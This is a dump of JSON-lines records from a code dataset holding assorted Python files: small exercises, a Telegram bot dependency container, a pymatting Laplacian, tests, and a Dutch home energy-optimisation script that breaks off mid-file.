port=3000)\n","repo_name":"aismail83/final_projet","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31045409746","text":"# Make a Class for applying discount on laptop Price:\n\nclass Laptop:\n def __init__(self, brand, model, price):\n self.brand = brand\n self.model = model\n self.price = price\n self.laptop_name = brand + \" \" + model\n def discount(self, value):\n discount = self.price - ((value/100)*self.price)\n return f\"Price = {self.price} \\nDiscount Applied = {value}% \\nFinal Price = {discount}\"\n\ndevice1 = Laptop(\"HP\", \"Pro-Book\", 72000)\nprint(device1.laptop_name,'\\n',device1.discount(20))\n\nprint('\\n')\n\ndevice2 = Laptop(\"Dell\", \"DRX1101\", 60000)\nprint(device2.laptop_name,'\\n',device2.discount(20))","repo_name":"arpitgupta630/Python","sub_path":"Youtube/C16E02.py","file_name":"C16E02.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27834434756","text":"# Verifica se a pessoa tem condições de pagar\n\nvalorCasa = float(input('Digite o valor da casa a ser comprada: '))\nsalario = float(input('Digite o valor do seu salário: '))\nqtAnos = int(input('Digite a quantidade de anos que você pretende pagar: '))\nmaxParcela = salario * 30 / 100\nparcelas = qtAnos * 12\nvalorParcela = valorCasa / qtAnos\n\nif valorParcela > maxParcela:\n print('Seu empréstimo foi negado. ')\nelse:\n print('Empréstimo aprovado!')\n\nprint('-' * 20)\nprint('Quantidade Parcela: {}'.format(parcelas))\nprint('Valor Parcela.....: {:.2f}'.format(valorParcela))\n","repo_name":"szagot/python-curso","sub_path":"2-Básico/exercicios/1-Condicoes-Aninhadas/1-Aprovacao-Emprestimo.py","file_name":"1-Aprovacao-Emprestimo.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18106262155","text":"import aiogram\nimport aiohttp\nimport arq\nimport asyncpg\n\nfrom redis.asyncio.client import Redis\n\nfrom . import settings\nfrom . import database\n\n\nclass Dependencies:\n def __init__(self):\n self._cfg = settings.get_config()\n self._bot = aiogram.Bot(self._cfg.tg_token)\n\n self._http_client = None\n self._db_pool = None\n self._redis = None\n self._queues = None\n\n async def _on_startup(self):\n await self.get_db_pool()\n await self.get_redis()\n await self.get_queues()\n await self.get_http_client()\n\n async def _on_shutdown(self):\n if self._http_client:\n await self._http_client.close()\n if self._queues:\n await self._queues.close()\n if self._db_pool:\n await self._db_pool.close()\n\n def get_cfg(self) -> settings.Settings:\n assert self._cfg\n return self._cfg\n\n async def get_db_pool(self) -> asyncpg.Pool:\n if not self._db_pool:\n cfg = self.get_cfg()\n self._db_pool = await asyncpg.create_pool(cfg.pg_conn)\n\n assert self._db_pool\n return self._db_pool\n\n async def get_redis(self) -> Redis:\n if not self._redis:\n cfg = self.get_cfg()\n self._redis = Redis(\n host=cfg.redis_host,\n port=cfg.redis_port,\n password=cfg.redis_password,\n )\n await self._redis.ping()\n return self._redis\n\n async def get_queues(self) -> arq.connections.ArqRedis:\n if not self._queues:\n cfg = self.get_cfg()\n redis_settings = arq.connections.RedisSettings(\n host=cfg.redis_host,\n port=cfg.redis_port,\n password=cfg.redis_password,\n )\n self._queues = await arq.create_pool(redis_settings)\n\n assert self._queues\n return self._queues\n\n def get_bot(self) -> aiogram.Bot:\n assert self._bot\n return self._bot\n\n async def get_db(self):\n pool = await self.get_db_pool()\n assert pool\n return database.database.DataBase(pool)\n\n async def get_http_client(self) -> aiohttp.ClientSession:\n if not self._http_client:\n self._http_client = aiohttp.ClientSession(\n raise_for_status=True,\n timeout=aiohttp.ClientTimeout(\n total=self._cfg.http_client_timeout,\n ),\n )\n assert self._http_client\n return self._http_client\n\n\n_deps = Dependencies()\n\n\ndef get() -> Dependencies:\n return _deps\n\n\nasync def on_startup():\n await _deps._on_startup()\n\n\nasync def on_shutdown():\n await _deps._on_shutdown()\n","repo_name":"IsThisLoss/manga-notify","sub_path":"manga_notify/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24985315810","text":"print(\"hello world\")\n\nimport requests\nimport json\n\n\nx = requests.get('http://api.forismatic.com/api/1.0/?method=getQuote&format=json&lang=en')\nj = x.json()\nmsg = []\nprint('Motivational quote of the day: \"' + j['quoteText'] + '\" -' + j[\"quoteAuthor\"])\n\n\n","repo_name":"michaelpropp18/MotiBOT","sub_path":"MotiBOT.py","file_name":"MotiBOT.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5990612452","text":"from pymatting.util.util import (\n grid_coordinates,\n sparse_conv_matrix,\n weights_to_laplacian,\n)\nimport numpy as np\n\n\ndef uniform_laplacian(image, radius=1):\n \"\"\"This function returns a Laplacian matrix with all weights equal to one.\n\n Parameters\n ----------\n image: numpy.ndarray\n Image with shape :math:`h\\\\times w \\\\times 3`\n radius: int\n Radius of local window size, defaults to 1, i.e. only adjacent pixels are considered.\n The size of the local window is given as :math:`(2 r + 1)^2`, where :math:`r` denotes the radius. A larger radius might lead to violated color line constraints, but also\n favors further propagation of information within the image.\n\n Returns\n -------\n L: scipy.sparse.spmatrix\n Matting Laplacian\n \"\"\"\n height, width = image.shape[:2]\n window_size = 2 * radius + 1\n\n W = sparse_conv_matrix(width, height, np.ones((window_size, window_size)))\n\n return weights_to_laplacian(W)\n","repo_name":"pymatting/pymatting","sub_path":"pymatting/laplacian/uniform_laplacian.py","file_name":"uniform_laplacian.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1613,"dataset":"github-code","pt":"53"} +{"seq_id":"17214290484","text":"class Solution:\n def isMatch(self, s, p):\n # easy to understand DP solution, but it takes O(len(s) * len(p)) times, and the same amount of space\n table = [[False] * (len(s) + 1) for _ in range(len(p) + 1)]\n\n table[0][0] = True\n \n for i in range(2, len(p) + 1):\n table[i][0] = table[i - 2][0] and p[i - 1] == '*'\n\n for i in range(1, len(p) + 1):\n for j in range(1, len(s) + 1):\n if p[i - 1] != \"*\":\n table[i][j] = table[i - 1][j - 1] and \\\n (p[i - 1] == s[j - 1] or p[i - 1] == '.')\n else:\n table[i][j] = table[i - 2][j] or table[i - 1][j]\n if p[i - 2] == s[j - 1] or p[i - 2] == '.':\n table[i][j] |= table[i][j - 1]\n\n return table[-1][-1]\n \n \n \"\"\"\n I have another idea of solving this problem, with code listed below,\n the code still has problems that need to be fixed as it still fails\n the test, I tried to fix it but I have no luck finishing it since the\n DP solution is very obvious. The second idea runs in linear time in\n the size of s and p, so they will loop through s and p exactly once,\n but there are too many cases to be considered, for instance, if s is\n 'aab', and p is 'a*b*ab', then the algorithm need to figure out that\n the first 'a*' should only match 'a', not 'aa', so the actual\n solution(if finished), should be very complicated and hard to understand,\n but it's a good reference so that I copied them below.\n \"\"\"\n# prev_match_char, curr_pattern_index, curr_string_index, prev_count = \"\", 0, 0, 0\n# str_len = len(s)\n# pat_len = len(p)\n \n# while curr_pattern_index < pat_len: # read until the match pattern string end\n# char = s[curr_string_index] if curr_string_index < str_len else \"\"\n# match_char = p[curr_pattern_index]\n# match_any_char = True if match_char == \".\" else False # current match character is ., so match any character\n# if curr_pattern_index < pat_len - 1 and p[curr_pattern_index + 1] == \"*\": # next character is *\n# curr_pattern_index += 2\n \n# # match 0 or more of the character\n# while char == match_char or match_any_char:\n# prev_count += 1\n# prev_match_char = char\n# curr_string_index += 1\n# if not curr_string_index < str_len:\n# break\n# char = s[curr_string_index]\n# else:\n# if prev_count > 0 and (match_char == prev_match_char or match_char==\".\"):\n# curr_count = 0\n# while curr_pattern_index < pat_len:\n# if p[curr_pattern_index] == prev_match_char or p[curr_pattern_index] == \".\":\n# curr_count += 1\n# curr_pattern_index += 1\n# continue\n# break\n# if prev_count > 0 and curr_count > prev_count:\n# print(\"case 1\", curr_count, prev_count)\n# return False\n# else:\n# if not (match_any_char or char==match_char):\n# print(\"case 2\", \"-\", char, \"-\", match_char)\n# return False\n\n# prev_count = 0\n# curr_string_index += 1\n# curr_pattern_index += 1\n \n# # we have reached the end of the match string but not the input string, so they don't match\n# if curr_string_index < str_len:\n# print(\"Case3\", curr_string_index, str_len)\n# return False\n \n# return True # everying matches, so return True\n ","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/dynamic_programming/10_RegularExpressionMatching.py","file_name":"10_RegularExpressionMatching.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37351385752","text":"class ArrayOperations:\n def binarysearch_iterative(self,A, key):\n l = 0\n r = len(A)-1\n while l <= r:\n mid = (l + r) // 2\n if key == A[mid]:\n return mid\n elif key < A[mid]:\n r = mid - 1\n elif key > A[mid]:\n l = mid + 1\n return -1\n \n def AddElement(self,e,index):\n A.insert(e,index)\n\n def RemoveElement(self,e):\n A.remove(e)\n\nA = [15,21,47,84,96]\na=ArrayOperations()\nfound =a.binarysearch_iterative(A,84)\nprint('Result: ',found)\na.AddElement(3,1)\nprint(A)\na.RemoveElement(1)\nprint(A)\n","repo_name":"AmitChapde/Practice","sub_path":"arrayADT.py","file_name":"arrayADT.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5509436056","text":"from typing import List, Optional, Iterable, Dict\n\nfrom FLD_generator.word_banks import build_wordnet_wordbank, POS, ATTR, get_form_types\nimport logging\nfrom logger_setup import setup as setup_logger\n\nimport line_profiling\n\nsetup_logger(level=logging.INFO)\n\n\ndef test_word_bank(lang: str,\n vocab_restrictions: Optional[Dict[POS, List[str]]] = None):\n wb = build_wordnet_wordbank(lang, vocab_restrictions=vocab_restrictions)\n _test_word_bank(wb)\n\n\ndef _test_word_bank(wb):\n\n def get_words(pos: Optional[POS] = None,\n attrs: Optional[List[ATTR]] = None) -> Iterable[str]:\n attrs = attrs or []\n for word in wb.get_words():\n if pos is not None and pos not in wb.get_pos(word):\n continue\n if any((attr not in wb.get_attrs(word)\n for attr in attrs\n if attr is not None)):\n continue\n yield word\n\n for pos in POS:\n for attr in [None] + list(ATTR):\n for word in get_words(pos=pos, attrs=[attr]):\n if attr is None:\n print(f'{str(pos):<10}{\"None\":<30}{word:<20}')\n else:\n print(f'{str(pos):<10}{str(attr.value):<30}{word:<20}')\n\n try:\n form_types = get_form_types(pos)\n except NotImplementedError as e:\n continue\n\n if form_types is not None:\n for form_type in form_types:\n try:\n inflated_word = wb.change_word_form(word, form_type)\n except NotImplementedError as e:\n continue\n if inflated_word is not None:\n print(f' {str(form_type):<40}{str(inflated_word):<40}')\n\n\nif __name__ == '__main__':\n test_word_bank('eng')\n\n # # restricted vocab\n # test_word_bank(\n # 'eng',\n # vocab_restrictions={\n # POS.VERB: ['walk', 'run'],\n # POS.NOUN: ['apple', 'banana'],\n # POS.ADJ: ['tasty', 'beautiful'],\n # POS.ADJ_SAT: ['red', 'green'],\n # }\n # )\n\n # test_word_bank('jpn')\n","repo_name":"hitachi-nlp/FLD-generator","sub_path":"tests/FLD_generator/test_word_banks.py","file_name":"test_word_banks.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"72957380009","text":"import pytest\nfrom mock import Mock, patch\n\nfrom comitup import mdns\n\n# Copyright (c) 2017-2019 David Steele \n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n# License-Filename: LICENSE\n\n\n@pytest.fixture()\ndef avahi_fxt(monkeypatch, request):\n monkeypatch.setattr(\"comitup.mdns.dbus.Interface\", Mock())\n monkeypatch.setattr(\"comitup.mdns.dbus.SystemBus\", Mock())\n monkeypatch.setattr(\"comitup.mdns.log\", Mock())\n monkeypatch.setattr(\"comitup.mdns.config.persist\", Mock())\n\n save_group = mdns.group\n mdns.group = Mock()\n\n yield None\n\n mdns.group = save_group\n\n\ndef test_avahi_null(avahi_fxt):\n pass\n\n\ndef test_avahi_establish_group(avahi_fxt):\n old_group = mdns.group\n mdns.group = None\n mdns.establish_group()\n assert mdns.group is not None\n mdns.group = old_group\n\n\ndef test_avahi_make_a_record(avahi_fxt):\n mdns.make_a_record(\"host\", 1, \"1.2.3.4\")\n assert mdns.group.AddRecord.called # type: ignore\n\n\ndef test_avahi_add_service(avahi_fxt):\n mdns.add_service(\"host\", 1, \"1.2.3.4\", \"::1\")\n assert mdns.group.AddService.called # type: ignore\n\n\n@patch(\"comitup.mdns.establish_group\", Mock())\ndef test_avahi_clear_entries(avahi_fxt):\n isempty = Mock(return_value=False)\n mdns.group = Mock()\n mdns.group.IsEmpty = isempty\n\n oldgroup = mdns.group\n\n mdns.clear_entries()\n\n assert isempty.called\n assert oldgroup.Reset.called\n assert not mdns.log.called # type: ignore\n\n\n@pytest.mark.parametrize(\n \"dns_in, dns_out\",\n (\n (\"a.b.c\", \"a.b.c\".encode()),\n (\"A.B.C\", \"A.B.C\".encode()),\n (\"a..b\", \"a.b\".encode()),\n (\"a.b.\", \"a.b\".encode()),\n ),\n)\ndef test_avahi_encode_dns(dns_in, dns_out):\n assert dns_out == mdns.encode_dns(dns_in)\n\n\n@patch(\"comitup.mdns.log.warn\")\ndef test_avahi_clear_fail(warn, avahi_fxt):\n mdns.group = None\n mdns.clear_entries()\n","repo_name":"davesteele/comitup","sub_path":"test/test_mdns.py","file_name":"test_mdns.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"53"} +{"seq_id":"3658985006","text":"import numpy as np\r\n\r\ndef solvepuzzle(n, k):\r\n numdrops = np.array([[0]*(k+1)]*(n+1))\r\n\r\n for i in range(k+1):\r\n numdrops[1, i] = i\r\n\r\n for i in range(2, n+1):\r\n for j in range(1, k+1):\r\n minimum = float('inf')\r\n\r\n for x in range(1, j+1):\r\n minimum = min(minimum, (1+max(numdrops[i, j-x], numdrops[i-1, x-1])))\r\n\r\n numdrops[i, j] = minimum\r\n\r\n print(numdrops)\r\n return numdrops[n, k]\r\n\r\nt = solvepuzzle(4, 20)\r\nprint(t)\r\n\r\n","repo_name":"percent4/Dynamic_Programming_examples","sub_path":"egg_dropping_problem.py","file_name":"egg_dropping_problem.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5927967773","text":"import numpy as np\nfrom typing import Any, Set\nfrom helloWorldPython.src.features.DateUtils import isLeapYear\n\ndef myConcat(strA, strB=\"biere\"):\n return strA + strB\n\ndef functionThatCallsMyConcat(s1, s2):\n tmp = myConcat(s1, s2) + \"!\"\n return tmp\n\ndef getIsLeapYearMsg(year):\n leapYear = isLeapYear(year)\n msg= str(year)\n if leapYear:\n msg = msg + \" est bien une année bissextile!\"\n else:\n msg = msg + \" n'est pas une année bissextile!\"\n return msg\n\ndef uniformize(str_to_uniform: str) -> str:\n uniformed_str = str_to_uniform.lower().replace('(', '') \\\n .replace(')', '').replace('.', '')\n return uniformed_str\n\ndef distance(s1: Set[Any], s2: Set[Any]) -> float:\n inter_len = len(s1.intersection(s2))\n jaccard = inter_len / len(s1.union(s2))\n cosinus = inter_len / np.sqrt(len(s1)*len(s2))\n return (jaccard + cosinus) / 2\n\n#For debug only\nif __name__ == \"__main__\":\n print(getIsLeapYearMsg(2020))\n ","repo_name":"nicolasDubois64/helloWorldPython","sub_path":"src/features/StrUtils.py","file_name":"StrUtils.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16413961638","text":"from sqlite3 import Cursor\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom customtkinter import *\nfrom PIL import ImageTk, Image\nfrom tkinter import ttk\nfrom time import strftime\nfrom tkcalendar import Calendar\nfrom I_Spinbox import Spinbox1, Spinbox2, Spinbox3\nimport sqlite3\nimport time\nimport multiprocessing\nimport sqlite3\nimport pyomo.environ as pe\nimport pyomo.opt as po\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom scipy.interpolate import make_interp_spline\nfrom multiprocessing import Value, Array\nfrom random import uniform\ncurrent_hour = 2\n\ncon = sqlite3.connect(\"D_VolledigeDatabase.db\")\ncur = con.cursor()\nres = []\ndef tuples_to_list(list_tuples, categorie, index_slice):\n # list_tuples = lijst van gegevens uit een categorie die de database teruggeeft\n # In de database staat alles in lijsten van tuples, maar aangezien het optimalisatie-algoritme met lijsten werkt\n # moeten we deze lijst van tuples nog omzetten naar een gewone lijst van strings of integers\n if categorie == \"Apparaten\" or categorie == \"SoortApparaat\" or categorie == \"NamenBatterijen\":\n # zet alle tuples om naar strings\n list_strings = [i0[0] for i0 in list_tuples]\n for i1 in range(len(list_strings)):\n if list_strings[i1] == 0:\n list_strings = list_strings[:i1]\n return list_strings\n return list_strings\n\n if categorie == \"FinaleTijdstip\" or categorie == \"UrenWerk\" or categorie == \"UrenNaElkaar\" or categorie == \"BeginUur\" \\\n or categorie == \"RememberSettings\" or categorie == \"Status\":\n # Zet alle tuples om naar integers\n list_ints = [int(i2[0]) for i2 in list_tuples]\n if index_slice != -1:\n list_ints = list_ints[:index_slice]\n # Gaat alle integers af en vervangt alle nullen naar \"/\"\n for i3 in range(len(list_ints)):\n if list_ints[i3] == 0:\n list_ints[i3] = \"/\"\n return list_ints\n\n if categorie == \"Wattages\" or categorie == \"MaxEnergie\" or categorie == \"OpgeslagenEnergie\":\n list_floats = [float(i2[0]) for i2 in list_tuples]\n if index_slice != -1:\n list_floats = list_floats[:index_slice]\n # Gaat alle integers af en vervangt alle nullen naar \"/\"\n for i3 in range(len(list_floats)):\n if list_floats[i3] == 0:\n list_floats[i3] = \"/\"\n return list_floats\n\n if categorie == \"ExacteUren\" or categorie == \"VastVerbruik\":\n # Zet tuples om naar strings\n # Alle nullen worden wel als integers weergegeven\n list_strings = [i4[0] for i4 in list_tuples]\n if index_slice != -1:\n list_strings = list_strings[:index_slice]\n list_ints = []\n # Als een string 0 wordt deze omgezet naar een \"/\"\n for i5 in list_strings:\n if i5 == 0:\n list_ints.append([\"/\"])\n else:\n # Splitst elke lijst waar een dubbelpunt in voorkomt zodat ieder uur nu apart in lijst_uren staat\n lijst_uren = i5.split(\":\")\n lijst_uren_ints = []\n # Overloopt alle uren en voegt deze toe aan de lijst van exacte uren die bij dat apparaat hoort\n for uur in lijst_uren:\n lijst_uren_ints.append(int(uur))\n # Voegt de lijst van exacte uren van een apparaat bij de lijst van exacte uren van de andere apparaten\n list_ints.append(lijst_uren_ints)\n return list_ints\ndef gegevens_opvragen():\n global con, cur, res, Prijzen24uur, Gegevens24uur\n # Datum die wordt ingegeven in de interface\n uur = str(input(\"Geef het uur: \"))\n dag = str(input(\"Geef de dag: \"))\n maand = str(input(\"Geef de maand: \"))\n #################################\n # Deel 1 Gegevens Belpex opvragen\n #################################\n\n # In de Belpex database staan maanden aangeduid met twee cijfers bv: 07 of 11\n if len(maand) == 1:\n maand = \"0\" + maand\n # Datums lopen van 1 oktober 2021 tot 30 september\n if int(maand) >= 9:\n tupleBelpex = (dag + \"/\" + maand + \"/\" + \"2021 \" + uur + \":00:00\",)\n else:\n tupleBelpex = (dag + \"/\" + maand + \"/\" + \"2022 \" + uur + \":00:00\",)\n print(\"*****Lijsten uit CSV*****\")\n print(tupleBelpex)\n # Geeft alle waardes in de kolom DatumBelpex en stop die in Dates\n res = cur.execute(\"SELECT DatumBelpex FROM Stroomprijzen\")\n Dates = res.fetchall()\n # Gaat alle tuples af in Dates, zoekt de tuple van de datum en geeft de index hiervan\n index = [tup for tup in Dates].index(tupleBelpex)\n # Geeft alle waardes in de kolom Prijs en stop die in Prijzen\n res = cur.execute(\"SELECT Prijs FROM Stroomprijzen\")\n Prijzen = res.fetchall()\n # Nu prijzen voor de komende 24 uren zoeken\n Prijzen24uur = []\n for i in range(0, 24):\n # Geeft de prijs op index -i\n prijs = Prijzen[index - i]\n # Database geeft altijd tuples terug dus eerst omzetten naar string\n prijsString = str(prijs)\n # Het stuk waar geen informatie staat afsnijden\n prijsCijfers = prijsString[6:-3]\n # Komma vervangen naar een punt zodat het getal naar een float kan omgezet worden\n prijsCijfersPunt = prijsCijfers.replace(\",\", \".\")\n # Delen door 1 000 000 om van MWh naar kWh te gaan\n prijsFloat = float(prijsCijfersPunt) / 1000\n # Toevoegen aan de rest van de prijzen\n Prijzen24uur.append(prijsFloat)\n # Print lijst met de prijzen van de komende 24 uur\n print(\"Prijzen24uur\")\n print(Prijzen24uur)\n\n #################################\n # Deel 2 Gegevens Weer opvragen\n #################################\n # maanden, dagen en uren worden steeds voorgesteld met 2 cijfers\n if len(maand) == 1:\n maand = \"0\" + maand\n if len(dag) == 1:\n dag = \"0\" + dag\n if len(uur) == 1:\n uur = \"0\" + uur\n # Correcte constructie van de datum maken\n tupleWeer = (\"2016\" + \"-\" + maand + \"-\" + dag + \"T\" + uur + \":00:00Z\",)\n\n res = cur.execute(\"SELECT DatumWeer FROM Weer\")\n Dates = res.fetchall()\n\n index = [tup for tup in Dates].index(tupleWeer)\n\n res = cur.execute(\"SELECT Windsnelheid, Temperatuur, RadiatieDirect, RadiatieDiffuse FROM Weer\")\n alleGegevens = res.fetchall()\n\n TemperatuurLijst = []\n RadiatieLijst = []\n for i in range(0, 24):\n dagGegevens = alleGegevens[index + i]\n TemperatuurLijst.append(float(dagGegevens[1]))\n RadiatieLijst.append((float(dagGegevens[2]) + float(dagGegevens[3])) / 1000)\n Gegevens24uur = [TemperatuurLijst, RadiatieLijst]\n # Print lijst onderverdeeld in een lijst met de temperaturen van de komende 24 uur\n # en een lijst voor de radiatie van de komende 24 uur\n print(\"Gegevens24uur\")\n print(Gegevens24uur)\n\n return Prijzen24uur, Gegevens24uur\nsolver = po.SolverFactory('glpk')\nm = pe.ConcreteModel()\n###################################################################################################################\n#######################################################################################################################\n# ********** Tuples omzetten naar lijsten **********\n# Verbinding maken met de database + cursor plaatsen (wss om te weten in welke database je wilt werken?)\ncon = sqlite3.connect(\"D_VolledigeDatabase.db\")\ncur = con.cursor()\n#######################################################################################################################\n# Zoekt de kolom Apparaten uit de tabel Geheugen\nres = cur.execute(\"SELECT Apparaten FROM Geheugen\")\n# Geeft alle waarden in die kolom in de vorm van een lijst van tuples\nListTuplesApparaten = res.fetchall()\n# Functie om lijst van tuples om te zetten naar lijst van strings of integers\nindex = -1\nApparaten = tuples_to_list(ListTuplesApparaten, \"Apparaten\", index)\nif len(Apparaten) != len(ListTuplesApparaten):\n index = len(Apparaten)\n# Idem vorige\nres = cur.execute(\"SELECT Wattages FROM Geheugen\")\nListTuplesWattages = res.fetchall()\nWattages = tuples_to_list(ListTuplesWattages, \"Wattages\", index)\n\nres = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\nListTuplesExacteUren = res.fetchall()\nExacteUren = tuples_to_list(ListTuplesExacteUren, \"ExacteUren\", index)\n\nres = cur.execute(\"SELECT BeginUur FROM Geheugen\")\nListTuplesBeginUur = res.fetchall()\nBeginUur = tuples_to_list(ListTuplesBeginUur, \"BeginUur\", index)\n\nres = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\nListTuplesFinaleTijdstip = res.fetchall()\nFinaleTijdstip = tuples_to_list(ListTuplesFinaleTijdstip, \"FinaleTijdstip\", index)\n\nres = cur.execute(\"SELECT UrenWerk FROM Geheugen\")\nListTuplesUrenWerk = res.fetchall()\nUrenWerk = tuples_to_list(ListTuplesUrenWerk, \"UrenWerk\", index)\n\nres = cur.execute(\"SELECT UrenNaElkaar FROM Geheugen\")\nListTuplesUrenNaElkaar = res.fetchall()\nUrenNaElkaar = tuples_to_list(ListTuplesUrenNaElkaar, \"UrenNaElkaar\", index)\n\nres = cur.execute(\"SELECT SoortApparaat FROM Geheugen\")\nListTuplesSoortApparaat = res.fetchall()\nSoortApparaat = tuples_to_list(ListTuplesSoortApparaat, \"SoortApparaat\", index)\n\nres = cur.execute(\"SELECT RememberSettings FROM Geheugen\")\nListTuplesRememberSettings = res.fetchall()\nRememberSettings = tuples_to_list(ListTuplesRememberSettings, \"RememberSettings\", index)\n\nres = cur.execute(\"SELECT Status FROM Geheugen\")\nListTuplesStatus = res.fetchall()\nStatus = tuples_to_list(ListTuplesStatus, \"Status\", index)\n#######################################################################################################################\nindex = -1\nres = cur.execute(\"SELECT VastVerbruik FROM InfoLijsten24uur\")\nListTuplesVastVerbruik = res.fetchall()\nVastVerbruik = tuples_to_list(ListTuplesVastVerbruik, \"VastVerbruik\", index)\n#######################################################################################################################\nindex = -1\nres = cur.execute(\"SELECT Aantal FROM Zonnepanelen\")\nTupleAantal = res.fetchall()\nAantal = [int(i2[0]) for i2 in TupleAantal][0]\n\nres = cur.execute(\"SELECT Oppervlakte FROM Zonnepanelen\")\nTupleOppervlakte = res.fetchall()\nOppervlakte = [float(i2[0]) for i2 in TupleOppervlakte][0]\n\nres = cur.execute(\"SELECT Rendement FROM Zonnepanelen\")\nTupleRendement = res.fetchall()\nRendement = [float(i2[0]) for i2 in TupleRendement][0]\n#######################################################################################################################\nindex = -1\nres = cur.execute(\"SELECT NamenBatterijen FROM Batterijen\")\nListTuplesNamenBatterijen = res.fetchall()\nNamenBatterijen = tuples_to_list(ListTuplesNamenBatterijen, \"NamenBatterijen\", index)\nif len(NamenBatterijen) != len(ListTuplesNamenBatterijen):\n index = len(NamenBatterijen)\n\nres = cur.execute(\"SELECT MaxEnergie FROM Batterijen\")\nListTuplesMaxEnergie = res.fetchall()\nMaxEnergie = tuples_to_list(ListTuplesMaxEnergie, \"MaxEnergie\", index)\n\nres = cur.execute(\"SELECT OpgeslagenEnergie FROM Batterijen\")\nListTuplesOpgeslagenEnergie = res.fetchall()\nOpgeslagenEnergie = tuples_to_list(ListTuplesOpgeslagenEnergie, \"OpgeslagenEnergie\", index)\n#######################################################################################################################\nres = cur.execute(\"SELECT TemperatuurHuis FROM Huisgegevens\")\nTupleTemperatuurHuis = res.fetchall()\nTemperatuurHuis = [float(i2[0]) for i2 in TupleTemperatuurHuis][0]\n\nres = cur.execute(\"SELECT MinTemperatuur FROM Huisgegevens\")\nTupleMinTemperatuur = res.fetchall()\nMinTemperatuur = [float(i2[0]) for i2 in TupleMinTemperatuur][0]\n\nres = cur.execute(\"SELECT MaxTemperatuur FROM Huisgegevens\")\nTupleMaxTemperatuur = res.fetchall()\nMaxTemperatuur = [float(i2[0]) for i2 in TupleMaxTemperatuur][0]\n\nres = cur.execute(\"SELECT VerbruikWarmtepomp FROM Huisgegevens\")\nTupleVerbruikWarmtepomp = res.fetchall()\nVerbruikWarmtepomp = [float(i2[0]) for i2 in TupleVerbruikWarmtepomp][0]\n\nres = cur.execute(\"SELECT COP FROM Huisgegevens\")\nTupleCOP = res.fetchall()\nCOP = [float(i2[0]) for i2 in TupleCOP][0]\n\nres = cur.execute(\"SELECT UWaarde FROM Huisgegevens\")\nTupleUWaarde = res.fetchall()\nUWaarde = [float(i2[0]) for i2 in TupleUWaarde][0]\n\nres = cur.execute(\"SELECT OppervlakteMuren FROM Huisgegevens\")\nTupleOppervlakteMuren = res.fetchall()\nOppervlakteMuren = [float(i2[0]) for i2 in TupleOppervlakteMuren][0]\n\nres = cur.execute(\"SELECT VolumeHuis FROM Huisgegevens\")\nTupleVolumeHuis = res.fetchall()\nVolumeHuis = [float(i2[0]) for i2 in TupleVolumeHuis][0]\n\nres = cur.execute(\"SELECT Kost FROM Huisgegevens\")\nTupleKost = res.fetchall()\nKost = [float(i2[0]) for i2 in TupleKost][0]\n#######################################################################################################################\nres = cur.execute(\"SELECT SentinelOptimalisatie FROM ExtraWaarden\")\nTupleSentinelOptimalisatie = res.fetchall()\nSentinelOptimalisatie = [int(i2[0]) for i2 in TupleSentinelOptimalisatie][0]\n\nres = cur.execute(\"SELECT SentinelInterface FROM ExtraWaarden\")\nTupleSentinelInterface = res.fetchall()\nSentinelInterface = [int(i2[0]) for i2 in TupleSentinelInterface][0]\n\nres = cur.execute(\"SELECT HuidigeDatum FROM ExtraWaarden\")\nTupleHuidigeDatum = res.fetchall()\nHuidigeDatum = [i2[0] for i2 in TupleHuidigeDatum][0]\n\nres = cur.execute(\"SELECT HuidigUur FROM ExtraWaarden\")\nTupleHuidigUur = res.fetchall()\nHuidigUur = [int(i2[0]) for i2 in TupleHuidigUur][0]\n\nres = cur.execute(\"SELECT TijdSeconden FROM ExtraWaarden\")\nTupleTijdSeconden = res.fetchall()\nTijdSeconden = [int(i2[0]) for i2 in TupleTijdSeconden][0]\n#######################################################################################################################\n# Ter 